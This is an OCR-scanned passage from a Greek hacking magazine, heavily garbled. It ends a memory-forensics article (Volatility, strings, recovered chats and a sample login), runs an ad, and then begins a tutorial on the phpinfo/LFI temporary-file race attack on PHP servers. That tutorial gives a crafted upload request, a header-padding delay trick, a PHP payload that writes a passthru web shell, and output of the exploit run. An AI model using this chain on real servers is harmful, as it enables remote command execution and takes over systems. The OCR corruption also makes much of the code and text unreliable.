ενηµερὠνοντάς το για τον κατάλογο µε Ta διαθέσιµα plugins και ζητώντας του va 
αξιοποιῆσει το chromehistory: 


# volatility --plugins=/usr/share/volatility/contrib/plugins/ -f rogue ρς 
dump.raw chromehistory -N --output=csv 


Όπως βλέπετε, για την ἐξοδο των αποτελεσμάτων ο Παντελἠς επέλεξε τη µορφή 
CSV (comma separated values). Ἐτσι ἐλαβε Eva αρχείο µε TO ιστορικὀ TOU browser, 
όπως αυτό εἶχε αποτυπωθεί στη μνήμη κι апо εκεὶ στο memory dump. Στη συνέχεια 
επιστράτευσε το προγραμματάκι Cat, για να εμφανίσει μερικὲς μόνο στήλες του ap- 
χείου: 


# cat chromehistory.csv | cut -d"," -Ε 2,3,4,6 
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> cat chromehistory.csv | cut -d"," -f 2,3,4,6 | sort 

"http://crypt.am/","Jabber Service","1","2015-01-20 15:35:13.462569" 

"http ://crypt.am/register.php", "Jabber", "1", "2015-01-20 15:35:46.635569" 
"http://deltahacker.gr/","","1","2015-01-20 15:43:45.085185" 

"http ://deltahacker.gr/", "deltaHacker","1","2015-01-20 15:43:45.085185" 
"https://list.jabber.at/","List of public XMPP servers","1","2015-01-20 15:35:01 


799569" 

"https ://www.google.com/intl/en/chrome/browser/welcome.html", "Getting Started"," 
", "2015-01-18 21:35:31.164091" 

"https://www.pidgin.im/download/", "Download Pidgin for Windows","1","2015-01-20 
5:24:45 .345470" 


Εικόνα 9 
Προσθέτοντας To plugin chromehistory στο volatility, καταφέραμε va 
σνασύρουµε éva πλήρες ιστορικὀ της περιήγησης. 


Στην εικὀνα 9 µπορείτε να Seite τα αποτελέσµατα που ἐλαβε ο φίλος µας. Παρατη- 
ρώντας ὁτι οι σελίδες που εἰχε επισκεφθεἰ ο χρήστης του υπολογιστή тау λίγες, ο 
Παντελἠς άρχισε να σκέπτεται πιο πονηρά. Μήπως ο χρήστης εἰχε χρησιμοποιήσει тп 
λειτουργἱα "Ιδιωτικής Περιήγησης", γνωστὴ κι ως "Incognito"; Έτσι, για ша βαθύτε- 
pn ανάλυση του memory dump, ο Παντελής αποφάσισε να εξαγάγει ὀλες τις συµ- 
βολοσειρὲς (strings). Εκεἰ μέσα, βλέπετε, ἦταν πολὺ πιθανὸ να κρύβονται ζουμερὲς 
πληροφορίες. Π' αυτή τη δουλειά χρησιμοποίησε το προγραμματάκι strings και µε 
τη βοήθεια του τελεστή ανακατεύθυνσης αποθήκευσε ὀλες τις συμβολοσειρὲς στο 
αρχεἰο strings.txt: 


# strings rogue_pc_dump.raw > strings.txt 


Meta an' αυτό, o Παντελἠς μπορούσε πλέον να χρησιμοποιήσει то grep και να βάλει 
στο παιχνίδι τις κανονικὲς εκφράσεις. Συνεχίζοντας την αναζήτηση για διευθύνσεις 
που ενδεχομένως να εἶχε επισκεφθεί ο χρήστης, ἐδωσε κάτι τέτοιο: 


# cat strings.txt | grep --only-matching --perl-regexp "http(s?):\/\/[% 
AAJ" > иг1.%хї 


Με auto το κολπἁάκι, ο Παντελἠς πἠρε µια πολύ μεγαλύτερη λίστα µε διευθύνσεις. 
Φυσικά, κάποιες апо αυτὲς επαναλαμβάνονταν πολλὲς φορὲς, καθώς αφορούσαν 
ξεχωριστά στοιχεία των ἰδιων ιστοσελἰδων (εικὀνες, αρχεἰα CSS και 15 κ.λπ). Eni- 
πρόσθετα, υπήρχαν και διευθύνσεις που δεν σχετίζονταν µε τον browser (μηνύματα 
των windows, ενημερώσεις προγραμμάτων к.а). Σε κάθε περίπτωση, ο Παντελὴς 
εἶχε καταφέρει να εντοπίσει όλες τις σελίδες που eixe επισκεφθεἰ ο χρήστης του 
μηχανήματος. 


H επόμενη ιδέα που eixe ο φίλος µας ἦταν να ψάξει εντὀς του strings.txt για μερικὲς 
λέξεις KAEIOIG που παρουσιάζουν ιδιαίτερο ενδιαφἑἐρον (login, sign-in, password, 
email, account к.а.). Έτσι, κατάφερε να εντοπίσει τη σύνδεση σε κάποια υπηρεσία, 
µε το буора χρήστη fake@hotmail.com και το συνθηµατικὀ fakepassword (εικόνα 
10). H διεύθυνση που εμφανιζόταν λίγο παραπάνω ano τα σχετικἀ τμήματα του 
strings.txt δεν υπήρχε στο ιστορικὀ του Chrome και συνεπώς о Παντελἠς συμπέρα- 
νε ὁτι ο χρήστης προσπαθούσε να κρατήσει τη συγκεκριμένη σύνδεση κρυφὴ. Αυτό 
ἦταν το прото εύρημα που τον ¿Kave να χαμογελάσει και, ὁπως αντιλαμβάνεστε, 
του ἐδωσε ώθηση να συνεχίσει. 


Όπως αναφέραμε παραπάνω, п λίστα των διεργασιών του συστήµατος περιλάμβανε 
και την εφαρμογὴ pidgin.exe (µε Process ID To 2840). Το συγκεκριµένο πρὀγραμμα 
ανταλλαγἠς μηνυμάτων υποστηρίζει пара πολλά πρωτόκολλα και υπηρεσίες, μεταξὺ 
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' 
I can t remember, but mu memoru dump can! 
X///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 


ogin=fake%40hotmail .c om&passwd=fakepasswo rd 
qU*85ZAHap3RA*0 xYXt5C TzpuywC1snhd 


ign+in& 
SYmHtb 


P8 
ogin i 834&i4=0&i7=0&i12=1&i i 2378115 
п_Соге%7С1%2С 


Εικόνα 10 
Ορίστε και кат! πιο ενδιαφέρον: То ὀνομα χρήστη και то avTi- 
отоо password, για κάποια δικτυακή υπηρεσία. 


των οποἰων και το Jabber. Αυτή η σκέψη ¿kave Tov Παντελὴ va ρἰξει μία ακόµα ματιά 
στο ιστορικὀ του Chrome. Όπως θα διαπιστώσετε αν κοιτάξετε пал την εικὀνα 9, ο 
χρήστης εἶχε συνδεθεὶ σε Eva site (list.jabber.net) που εμφανίζει διάφορους XMPP 
servers2, ὁπως επἰσης και ото site crypt.am, που αξιοποιεἰ το πρωτόκολλο jabber 
και υπόσχεται την ανταλλαγή μηνυμάτων χωρὶς τη διατήρηση κάποιου ιστορικού 
της συνομιλίας. Στην πραγματικότητα, αν και αυτά τα ευρήματα στο IOTOPIKO του 
Chrome σχετἰζονταν ἄμεσα µε то Pidgin, δεν ἦταν апараітпта και οὐτε καν κρἰσιµα. 
Απλά διευκόλυναν την αναζήτηση εντὀς Tou strings.txt. Χρησιμοποιώντας τις λέξεις 
κλειδιά "crypt.am" και "jabber", ο Παντελής ξετρύπωσε αμέσως διάφορα τμήματα 
των συνομιλιών που εἶχε ο χρήστης (εικὀνα 11). 


Μην πετάτετις μνήμες στο φούρνο 


Μέσα ano τη μικρή ιστορἱα του Παντελή, εἶναι φανερό бт! εξετάζοντας τα περιεχό- 
μενα της μνήμης μπορούμε να ξετρυπώνουμε ἑνα τεράστιο κι ευρύτατο σύνολο nàn- 
ροφοριών. Βέβαια, ο Παντελἠς εργάστηκε µε Eva πλἠρες memory dump, που ἐλαβε 
ano τον υπολογιστἠή ενόσω ἠταν σε λειτουργία. Στην περίπτωση της επίθεσης Cold 
Boot τα πράγματα εἶναι πολὺ πιο ζόρικα. Ката πάσα πιθανότητα To memory dump θα 
περιέχει πολλή σαβούρα (κατεστραμμένα δεδομένα), κι εξάλλου δεν εἶναι σίγουρο 
ότι θα μπορέσουμε να το αποκτήσουμε. 


Όταν δημοσιεύτηκε η σχετικὴ ἐρευνα апо το πανεπιστήμιο του Princeton, ἄρχισε va 
αναπτύσσεται έντονος προβληματισμὸς στους κύκλους των ερευνητών της ασφἀ- 
λειας. Στο прото συνέδριο Blackhat που ακολούθησε τη δημοσίευση της ἐρευνας, 
µια ομάδα παρουσίασε Eva συνδυασμὸ ειδικού hardware αλλά και software, που 
θα καθιστούσε την επίθεση Cold Boot ano δύσκολη ἑως αδύνατη”. Βέβαια, ακρι- 
Bac επειδἠ τα αντίµετρα NOU NPOTEIVE η συγκεκριμένη ομάδα απαιτούσαν ειδικὀ 
hardware, Πρὀκειται για µια λύση που δεν μπορεὶ να υλοποιηθεί εὐκολα. Πάντως, 
υπάρχουν µερικἀ κολπάκια που περιορἰζουν опраутіка την πιθανότητα να αποκτή- 
σει κανεὶς Eva αντίγραφο της μνήμης του υπολογιστή µας. Κατ' αρχάς, το πιο απλὀ 
πράγμα που μπορούμε να κάνουμε εἶναι να σβήνουμε τον υπολογιστή όταν δεν τον 


2. Πρόκειται για servers που προσφέρουν την υπηρεσία XMPP, η οποία επιτρέπει τη διακίνηση μηνυμάτων µε τη µορφή XML. 
3. Μπορείτε να διαβάσετε την παρουσίαση της ομάδας εδώ: www.blackhat.com/presentations/bh-usa-08/McGregor/BH_US_08_McGregor_ 
Cold_Boot_Attacks.pdf 
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χρειαζόμαστε ἡ ὀταν πρὀκειται va απομακρυνθούμε για λίγη ора. Περιττό να πούμε 
πως ὀταν μιλάμε για σβἠσιμο αναφερόμαστε στο shutdown και ὀχι στο sleep, στο 
suspend ἡ στο (ακόμα χειρότερο) hibernate. ‘Eva ἀλλο колпак: εἶναι να δυσκολὲ- 
шоире την πρόσβαση στις πλακέτες της μνήμης και, αν γίνεται, να καταστήσουμε 
την αφαἱρεσή τους αδύνατη. Μια τραβηγμένη λύση, στην περίπτωση που έχουμε 
laptop, θα ἦταν να κολλήσουμε το καπάκι της μνήμης! Αν έχουμε σύστημα desktop, 
кало θα ἦταν να χρησιμοποιήσουμε олс τις βίδες και επιπρόσθετα, να κλειδώσουμε 
το κουτί µε λουκέτο. Σε κάθε περίπτωση, µια ακόµα ἐξυπνη λύση εἶναι να anayo- 
ρεύσουμε την εκκίνηση του συστήµατος апо εξωτερικά αποθηκευτικά μέσα και να 
κλειδώσουμε το BIOS. Με αυτόν τον τρόπο, η εκκίνηση (boot) апо κάποιο USB, µε 
OKONO την εκτέλεση κάποιου προγράμματος που αντιγράφει ολόκληρη τη μνήμη, θα 
εἶναι αδύνατη. 


Όπως αντιλαμβάνεστε, τα аутір=тра που προτείνουμε εἶναι πολύ τραβηγµένα, алла 
ούτως ἡ ἄλλως κάνουμε λόγο για µια επίθεση που εἶναι επἰσης εξεζητημένη. Οἱ 
πιθανότητες να πραγματοποιήσει κάποιος то Cold Boot Attack στο ипхаупна µας 
εἶναι μηδαμινές. Εξάλλου, δεν πρέπει να ξεχνάμε бт! οι σημαντικότερες αναμνήσεις 
βρίσκονται στην ανθρώπινη μνήμη κι αυτὸ δεν πρὀκειται (οὐτε πρέπει) να αλλάξει ;) 


μ/Ππιπὶ; charset=UTF-8"><title>Conversation with cat@swissjabber.org at 1/20/2015 
7:40:12 ΑΜ on cat@crypt.am/ (jabber)</title></head><body><h3>Conversation with са 
t@swissjabber.org at 1/20/2015 7:40:12 AM on cat@crypt.am/ (jabber)</h3> 

<font color="#16569E"><font size="2">(7:40:18 AM)</font> <b>cat@crypt.am/52467102 


91421768382473104 :</b></font> Hi how are you?<br/> 
<font color="#A82F2F"><font size="2">(7:40:22 AM)</font> <b>cat@swissj abber.org:< 
/b></font> fine thank you<br/> 


Εικόνα 11 
Ένα απὀσπασμα των συνομιλιών του χρήστη µέσα апо το pidgin. 
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DigitalOcean 


Ταχύτατα VPSes oto cloud, σε hosts µε δίσµους SSD. 
Επιβογή datacenter σε Ευρώπη, Анєрїкї μαι Ασία. 
Lean-mean control panel, για απόϑυτο Eneyxo. 


Αποητήστε τώρα to δικό casVPS, 

oto cloud της DigitalOcean. 

Κάντε KAIK στο http://bit.ly/digocean10off 
μαι κερδίστε αυτομάτως 105 σε credit. 


Hint: Επιβέγοντας το кро πϑάνο, 

Πάντα με KAIK στο http: //bit. ly/digocean1Ooff, 
ουσιαστιμά έχετε δύο µήνες δωρεάν για ένα VPS 
µε 512MB RAM, 20GB SSD μαι 1TB transfer. 


ill Δεν είναι KI ἄσχημα 


απο:  " ἘΚ. 


Skill: Advanced 
Tags: phpinfo, LFI, post request, postback, web shell 
- 7 L) τη 


by Thiseas 


ы 20 


Πλάγιομετωπική µε web server, οδηγώντας РНР! 


Γνωρίζατε от! μπορούμε να στείλουμε αρχεία σε servers, που δεν τα ζήτησαν ποτὲ; 
E, λοιπὸν, Ох! μόνο μπορούμε, αλλά αυτά τα αρχεία θα αποθηκευτούν σε κἄποια 
προσωρινἠ θέση και µε κἀποιο προσωρινὀ ὀνομα, μόνο και μόνο για va διαγραφούν 
μερικὰ κλάσματα του δευτερολέπτου αργότερα. Υπό συνθήκες, το γεγονὸς aUTO µπορεἰ 


να οδηγήσει στην άλωση οποιουδήποτε server. 


Llp L YV CS 


Πλάγιο-μετωπική µε web server, οδηγώντας PHP! 
κκ κκ κκκκκκκκκκκκκκκκκκκκκκκκ--κ-κκκ-κο« 


Ως γνωστὸν, οι ευπάθειες που εντοπίζονται στα υπολογιστικά συστήµατα εἶναι αμὲ- 
τρητες και, κυρίως, μοιάζουν να µην εξαντλούνται ποτὲ. (>.T.E. Ίσως επειδἠ εἶναι 
αμέτρητες ἡ, για την ακρἰβεια, απειραριθμήσιμες.) Κάποιες αδυναμίες αφορούν στο 
hardware και κάποιες ἄλλες στο software, αλλά ακόµα κι αυτή η τόσο αδρἠ κατη- 
γοριοποίηση δεν σταματά εδὠ. Υπάρχουν bugs στο λογισμικὀ που εἶναι ἄγνωστα 
στον κατασκευαστὴ και διορθώνονται μόνον отау δηµμοσιευτεὶ µια επίθεση που та 
εκμεταλλεύεται (Oday attack). Υπάρχουν ὁμως και προβλήματα που εἶναι γνωστά 
στους κατασκευαστές, αλλά η αντιμετώπισή τους εἶναι δύσκολη ἡ και αδύνατη. Δεν 
αναφερόμαστε σε σφάλματα στον κὠδικα, αλλά στον τρόπο λειτουργίας, στη борі 
και στη λογική κάποιων προγραμμάτων. Αυτές οι αδυναμἰες εἶναι πολύ πιο ύπουλες 
και θεωρούνται апо τους ερευνητὲς ασφαλεἰας ως οι πιο επικἰνδυνες. Στο παρὀν àp- 
θρο θα καταπιαστοῦύμε HE µια τἐτοια αδυναμία. Θα αξιοποιήσουµμε τον προβληματικὀ 
τρόπο ре тоу οποίο συνεργάζεται η PHP µε κάποιους web servers, ενώ θα κατασκευ- 
ἄσουμε κι ἑνα σχετικὀ exploit. 


Δομικά συστατικἀ 


Για να γίνει κατανοητή η ευπάθεια πρέπει να αναφερθούμε σε κάποιες λεπτομέρειες. 
Ουσιαστικά, πρὀκειται για τα "τουβλάκια" µε τα опоіа θα χτίσουμε το exploit. Αυτά 
τα μικρά μυστικά αφορούν στον τρόπο λειτουργίας κάποιων προγραμμάτων ἡ και σε 
bugs, που αν και ἐχουν εντοπιστεὶ προ πολλού δεν τα διορθώνει κανένας. Εν ολἰὶ- 
γοις, οι πρῶτες µας ύλες Ва εἶναι τα δεδοµένα που xouv παρουσιασθεἰ κατὰ καιροὺς 
σε συνέδρια ασφαλείας ñ ¿xouv δηµοσιευτεἰ σε σχετικἀ papers. Πάντως, αξίζει να 
σημειώσουμε бт! η δουλειά µας βασίζεται κυρίως σ' Eva paper που δημοσιεύτηκε 
ano την Insomnia Security, στις 6 Σεπτεμβρίου του 2011 (http://goo.g1/VncsjK). Σας 
κάνει εντύπωση η ημερομηνία; Όσο κι αν σας φαΐνεται περἰεργο, η ευπάθεια που 
περιγράφεται στο εν λόγω paper δεν ἐχει διορθωθεί ακόμα. Πριν προχωρήσουμε, 
σημειώστε бт! για την επιτυχία της επἰθεσής µας πρέπει να συνυπάρχουν δύο (αρκε- 
та διαδεδομένες) αδυναμίες: 


1. Na επιτρέπεται η χρήση της συνάρτησης phpinfo (http://goo.g1/2tC31L). H ou- 
γκεκριµένη συνάρτηση παρέχει πληροφορίες που αφορούν στα settings του 
server, στα προγράμματα που εἶναι εγκατεστημένα (π.χ. MySQL), στις διάφο- 
PEC τιμὲς παραμέτρων της PHP, στις καθολικὲς μεταβλητές που χρησιμοποι- 
ouvtal κ.λπ. Πολλοί διαχειριστές δεν θεωρούν бт! η λειτουργία της αποτελεἰ 
πρόβλημα και επιτρέπουν τη χρήση της ελεύθερα. 


2. Να υπάρχει µια αδυναμία τύπου LFI (Local File Inclusion) (http://goo.g1/ 
εονΖ43). Όπως ὁλοι γνωρίζουν, αυτή η αδυναμία επιτρέπει στον επιτιθἐµενο 
να ενσωματώσει σε µια σελίδα το περιεχόµενο ενὸς αρχείου ἡ ενὸς ολόκλη- 
ρου καταλὀγου και μ' αυτόν τον τρόπο να апокта πρόσβαση σε δεδοµένα που 
υποτίθεται бт! εἶναι απροσπἐλαστα. Ένα κραυγαλέο παράδειγµα κὠδικα που 
διαθέτει αυτή την αδυναμία αποτελεί η ακόλουθη γραμμή: 


GET Load: ўе 2> 


Θέλουμε να πιστεύουμε ὁτι η θεωρία πίσω апо τις παραπάνω αδυναμίες εἶναι γνω- 
στἠ και δεν θα επεκταθούμε περισσότερο. Στη συνέχεια θα εξετάσουμε τα στοιχεία 
που πρέπει va ἐχει υπόψη του κανεὶς, για να κατανοήσει την επἰθεσὴ µας. 


Στοιχεῖο 1. Όταν κάνουµε upload µέσω της PHP, τα αρχεία που ανεβάζουμε αποθη- 
κεύονται αρχικἁ µε κἀποιο προσωρινό ὀνομα. Ac το εξετάσουμε λἰγο αυτὀ. Σε napa 
πολλὲς δικτυακὲς εφαρμογές, η PHP χρησιμοποιείται για το ανέβασμα αρχείων στον 
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server. Ας δούµε тоу κὠδικα ενὸς υποθετικού προγράµµατος ονόματι upload.php και 
µιας απλἠς σελἰδας που χρησιμοποιεὶ το συγκεκριµένο πρὀγραμμα үа το ανέβασμα 
αρχείων: 
<?php // upload.php 
define("UPLOAD DIR", "/var/www/http/uploads/") ; 
if(isset($ POST["Upload"])) í 
$name = $ FILES["myFile"]["name"]; 


$success = move_uploaded_file($ FILES["myFile"]["tmp_name"],UPLOAD DIR 
$name) ; 


if (!$success) í 


echo "<p>Unable to save file.</p>"; 


>> 
<!DOCTYPE html> 
<html> 
<body> 
<form action="upload.php" method="post" enctype="multipart/form-data"> 
<input type="file" name="myFile"> 
<br> 
<input type="submit" name="Upload" value="Upload"> 
</form> 
</body> 
</html> 


Ὅταν πραγµατοποιηθεἰ To postback (http://goo.gl/LbJcNS) -μόλις επιλέξουμε το ap- 
χεἰο που θέλουμε να ανεβάσουµε και NATNOOULE TO κουμπὶ Upload- θα οριστεἰ η HE- 
ταβλητή $_POST["Upload"]. Ταυτόχρονα, η PHP θα ἐχει αποδώσει µια τιµή και στην 
εσωτερικἠ (build-in) μεταβλητή $_FILES["myFile"]["tmp_name"]. Auth η µεταβλη- 
τὴ περιέχει το προσωρινό ὀνομα του αρχείου που θα δημιουργηθεί апо την PHP για 
απειροελάχιστο χρόνο (συνήθως àiya εκατοστά ñ χιλιοστά του δευτερολέπτου), нё- 
хр! να ολοκληρωθεί το ανέβασμα και να ξεκινήσει η ὀποια επεξεργασίἰα. 


Тора δώστε βάση στο attribute "...form action="upload.php"...". Το action περιγρά- 
φει τον προορισμό των δεδομένων NOU στέλνουμε, Отау πατάμε το σχετικὀ κουμπὶ 
της φόρμας. Ау στη θέση του "иріоаа.рһр" υπήρχε το "www.fbi.gov" τα δεδομένα 
μας θα κατευθύνονταν προς то server Tou FBI. "E, каг;" θα αναρωτηθεἰτε. "Τίποτα!" 
σας anavTdue. Τα δεδοµένα θα απορριφθούν апо τον server Tou FBI αλλά, πριν oup- 
Bei αυτὀ, θα ἐχουν αποθηκευτεἰ για κλάσματα του δευτερολέπτου σε κἄποιο προσω- 
ρινὸ αρχείο. Θυμηθείτε το αυτό! Φανταστείτε тора το εξἠς: Στη θέση του "upload. 
php" ἐχει τοποθετηθεἰ το "phpinfo.php", που αποτελεἰ Eva στοιχειώδες проүрарна 
για την αξιοποίηση της συνάρτησης phpinfo() και την εμφάνιση των πληροφοριών 
της PHP. Ауаротіёот τι θα γινόταν о’ ашт την περίπτωση; H εικὀνα 1 μιλάει апо 
μόνη της. H εκτέλεση της phpinfo εμφάνισε μεταξύ ἄλλων και το προσωρινό ὀνομα 
που αποδόθηκε στο αρχείο µας. Αυτή η πληροφορία (η τιμὴ της tmp_name) εἶναι 
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Rt 6 ) @ http://localhost/phpinfo.php τν 20115 ~ BS е || Eearch Ө - 


ο... ο ο ο ο... 


FREQUESTTUpload) |0 


_FILES["myFile"] 


[name] => text.txt 


[type] => 2 ксы 
[tmp_name] => Q 
[ezzor] => 0 


[size] => 16 


Εικόνα 1 
H εκτέλεση της συνάρτησης phpinfo επιστρέφει Και TO ὀνομα του про- 
σωρινού αρχείου, που δημιουργήθηκε µετά το upload. 


πολὺ σηµαντικἠ για To exploit που θα παρουσιάσουμε. Βέβαια, στη συγκεκριμένη 
περίπτωση αποκτήσαμε την πληροφορία εξαιτίας ενὸς τραγικού λάθους στον κὠδικα 
και δεν θα μπορούσαμε να στηριχτούµε σε кайт! τόσο σπάνιο. 


Στοιχεῖο 2. Μπορούμε να προσομοιώσουμε τη διαδικασἰα του upload, δημιουργώ- 
ντας και εκτελῶντας τα κατάλληλα web post requests (http://en.wikipedia.org/ 
wiki/POST(HTTP)), µέσω ενὸς προγράμματος που εκτελείται στο μηχάνημά µας. Ava- 
ρωτιέστε τι ONUGivouv ὁλα αυτά; То Васко που πρέπει να κρατήσετε εἶναι От! рпо- 
ρούμε va Ξεπιβάλλουμεξχ το ауёВасра ενὸς αρχείου και μάλιστα την GNOOTOAN του 
σε οποιοδήποτε πρόγραμμα του server, χωρίς να υπάρχει κἄποιο πρὀβλημα στον 
server και χωρίς να πειράξουμε κάτι σε αυτόν. Εξάλλου, κάτι TETOIO θα ἦταν αδύνατο 
αφού δεν έχουμε TOV ἐλεγχο TOU Server... ακόμα! AUTO που μπορούμε να κάνουμε, 
λοιπὸν, εἶναι να στείλουμε στο απομακρυσμένο μηχάνημα τα ἴδια ακριβώς αιτήματα 
που στέλνονται Отау πατάμε το κουμπἰ Upload. Αν και ο σκοπὸς του συγκεκριμένου 
ἄρθρου δεν εἶναι να διδάξει та Васка της PHP και Tou web application programming, 
σημειώστε От! µπορείτε να SEITE τη μορφή των αιτημάτων που αποστέλλονται отау 
πατάμε το κουμπί µιας φόρμας, µε εργαλεἰα ὁπως το Burp Suite (http://portswigger. 
net/burp) ñ µε plugins σαν το Tamper Data και το HTTP Headers. 


Ας δούµε тора Eva ὑπουλο web request, που προσπαθεἰ να στείλει Eva αρχείο απλού 
κειμένου µε το περιεχόμενο "I am Delta. R u Anadelta?": 
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HTTP_ACCEPT_LANGUAGE : 


HTTP_PRAGMA: 


Content-Type:  multipart/form-data; boundary=--------------------------- 
7dbff1ded 


0714 

Content-Length: 214 

lost: πο Eao E) 
----------------------------- 7dbff1ded0714 


Content-Disposition: form-data; name="dummyname"; filename="test.txt" 


Content-Type: text/plain 
I am Delta. R u Anadelta? 
----------------------------- 7dbff1ded0714— 


Στο παραπάνω request πρέπει να παρατηρήσετε τα εξἠς: Το αρχεἰο αποστέλλεται 
σε κάποιον server στη διεύθυνση 192.1681.19 και συγκεκριµένα, στο πρὀγραμμα 
phpinfo.php. Έτσι, αν στείλουμε το συγκεκριµένο request και o server διαθέτει το 
phpinfo.php, θα ανεβάσουµε το αρχείο και ταυτόχρονα θα μάθουμε το προσωρινό 
του буора. Φυσικά, το αρχεἰο µας θα παραμείνει στο server για Eva ελάχιστο χρονι- 
KÓ διάστηµα και μετὰ θα διαγραφεί. AUTO όμως δεν µας στεναχωρεὶ καθόλου. Μάλ- 
λον το αντἰθετο συμβαίνει, yiqTi δεν θα αφήσουμε ixvn ;) Το µόνο που θἑλουµε εἰναι 
να δηµιουργηθεἰ το αρχεἰο µε то προσωρινὀ ὀνομα - κι αυτό θα συµβεἰ. 


arrives HTTP POST with a file 
°” PHP begins analysis 

“7 „7 _, РНР creates temp file 
rd a” at” РНР writes data to temp file 


ot 7. PHP closes temp file 


script execution begins 


| [optional] script moves uploaded file 


script execution ends 


кш a ων ων of z , 
ο να’ wr ^ / . PHP removes temp files (if any) 
- К νο а gf 2 / : 
. ο . 9 ¢ ΄ 
ς΄ * + > . ΄ ΄ t 
Ё * . К ο. ΄ ΄ f 
+ .. or ϱ” ο ΄ ΄ { ὁ 
9 4 Ра . .. # ΄ ὲ 
Fog .* .. a ο e ΄ t >» 
к” . К ο . ΄ ΄ as 
е . ? = г“ ё ΄ £ 
: i 1 í : 
| ἫΝ. E 
: : го os ' ' I : А 
Е. р - Ж time 
Y Y Y YV Y Y Y Y Y > 


+ window of opportunity 1 
Εικόνα 2 


Όλα доа συμβαίνουν στην PHP ката τη διεξαγωγή της επίθεσης. 


ББ 


Πλάγιο-μετωπική µε web server, οδηγώντας PHP! 
κκ κκ 


Στοιχεῖο 3. Προηγουμένως εἶπαμε бт! το αρχείο µας θα παραμείνει στο server για 
απειροελάχιστο χρόνο. E, λοιπὸν, έχετε υπόψη σας ὁτι μπορούμε να παρατεΐνουμε 
τη διαμονή του. Πα να πετύχουμε κάτι τέτοιο арке! να καθυστερήσουμε τη διαδι- 
κασία του ανεβάσµατος. Με αυτόν τον τρόπο θα καθυστερήσει και η επακόλουθη 
διαγραφἠ. Όμως, πὠς μπορούμε να καθυστερήσουμε το upload; ‘Eva κὀλπο που 
μπορούμε να χρησιμοποιήσουμε εἶναι να γεµίσουµε та http-header (http://goo.g1/ 
nnueDU) µε πολλές επαναλήψεις ενὀὸς τυχαίου χαρακτήρα. Έτσι, όταν ο server 
λάβει τα παραφουσκωμένα headers, θα αργήσει να та επεξεργαστεἰ. Μην ξεχνάτε 
ότι ακόµα και µια καθυστέρηση του χιλιοστού του δευτερολέπτου εἶναι κρίσιμη! Βὲ- 
Bala, αν το παρακάνουμµε µε τη διόγκωση των headers, ενδέχεται να υπερβούμε TO 
μέγιστο επιτρεπὀµενο μῆκος (διαφέρει апо server σε server) και να "φάμε πόρτα". 
Ενδεικτικἀ, ἑνα µἐγεθος που δεν ξεπερνά τα επιτρεπτά Ора του Apache και το οποίο 
θα προκαλέσει ικανἠ καθυστέρηση στην επεξεργασία, εἶναι Ta 5000 bytes. Βέβαια, 
το ἴδιο μέγεθος για τον IIS ανέρχεται μόλις στα 50 bytes. Τρέχα γύρευε ;) 


File Edit View History Bookmarks Tools 


http://@ Ж .«np/g&f=whoami X 
ё © O Cg lf. php?load=/tmp/g&f=whoami Ν # рр у С а | 


apache 


Εικόνα 3 
O server nou δέχεται την επίθεση στηρίζεται στο CentOS και στον Apache. 
Όπως βλέπετε, η εκτέλεση του whoami επιτεύχθηκε ανεμπὀδιστα! 


Συνδυάζοντας τα δεδοµένα 


Τα στοιχεία που περιγράψαµε παραπάνω σχετίζονται µε τη δηµιουργία ενὸς προσω- 
ρινού αρχείου και προὐποθέτουν τη λειτουργία της συνάρτησης phpinfo. Αναρωτιέ- 
στε σε τι εξυπηρετεὶ η αδυναμία LFI, που αναφέραμε αρχικἁ σαν προὐπόθεση για 
την επιτυχἰα της επίθεσης; Ακριβώς αυτὀ θα εξετάσουμε тора. 


Μέχρι στιγμῆς εἶδαμε πὠς μπορούμε να ανεβάσουµε Eva αρχείο σε κἄποιον server, 
να καθυστερήσουμε τη διαγραφὴ του και να μάθουμε το προσωρινὀ του ὀνομα. 
Εφόσον òda αυτά πραγματοποιούνται µε επιτυχία, ἐχουμε µια µικρή (αλλά υπαρκτὴ) 
πιθανότητα να καταφέρουμε κάτι πολύ πιο επικἰνδυνο για τον server: Να προλάβου- 
µε να αξιοποιήσουμε το περιεχόµενο του προσωρινού αρχείου! To αν θα τα KaTa- 
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φέρουμε εξαρτάται апо το av o server διαθέτει kånoia ευπάθεια LFI. Αναρωτιέστε 
γιατὶ µπορεί να µας ενδιαφἑρει κάτι τέτοιο; Σκεφτείτε От! το αρχείο µας µπορεί va 
μην περιλαμβάνει κείμενο, εικόνα ἡ ἦχο, αλλά κὠδικα σε PHP. Πα παράδειγµα, ac 
υποθέσουμε бт! περιέχει την εξἠς γραμμὴ: 


<?php $c=fopen('tmp/g','w');fwrite($c,'<?php passthru($_GET["f"]);?>');?> 


Av εκμεταλλευτούμε την ευπάθεια LFI για να φορτώσουμε TO προσωρινὀ αρχείο, n 
παραπάνω γραμμή κὠδικα θα καταλήξει να εκτελεστεἰ апо τον interpreter της РНР. 
Αυτἠ η γραμμή орос, ἐχει σαν συνέπεια τη δημιουργία ενὸς αρχείου µε το буора g, 
το οποίο θα περιέχει τα εξής: 


<?php passthru($_GET["f"]);?> 


Ξέρετε τι εἶναι αυτό; Πρὀκειται για éva πολύ-πολύ апло web shell (http://goo.g1/ 
P@O5ir). Μάλιστα, επειδἠ το αρχεἰο g δεν θα σβηστεὶ апо κανέναν, δεν υπάρχει λόγος 
να βιαζὀμαστε πλέον. Av αξιοποιήσουµε пал! την ευπάθεια LFI για va φορτώσουμε 
TO g, οποιαδήποτε τιµή δώσουμε στη μεταβλητή ἔθα καταλήξει σαν παράμετρος στη 
συνάρτηση passthrough και τελικἁ θα φτάσει στο κέλυφος του server. Ἐτσι, αν GUTH 
η τιμή εἶναι µια εντολἡ που αναγνωρίζει το λειτουργικὀ του Server, θα εκτελεστεὶ 
κανονικἀ! Σε αυτὸ το σημείο µπορεί να διαμαρτυρηθείτε: Πα να συμβούν όλα αυτά 
πρέπει να εἶναι ενεργοποιημένη η συνάρτηση passthru κι αυτό συμβαΐνει σπάνια! 
Πολὺ σωστὰ, μόνο που εμείς εξετάζουμε то пос μπορούμε να εκμεταλλευτούμε την 
ύπαρξη του προσωρινού αρχείου σε συνδυασμό µε την ευπάθεια LFI και ὀχι το пос 
μπορούμε να φτιάξουμε Eva web shell. Εξάλλου, το αρχείο g μπορεί να праүрато- 
ποιεἰ ἄλλου εἶδους πονηριὲς και δεν εἶναι UNOXPEWTIKO να λειτουργεί σαν web shell. 


C:\windows\system32\cmd.exe 


2 8686 50 500 /tmp linux 
2, port =8686. 
numOf Threads=5@, maxattempts=50@, TEMP_DIR=/tmp (linux) 


found [tmp_name] at 126439. 
Spawning worker pool (5@)... 

58 7 500 
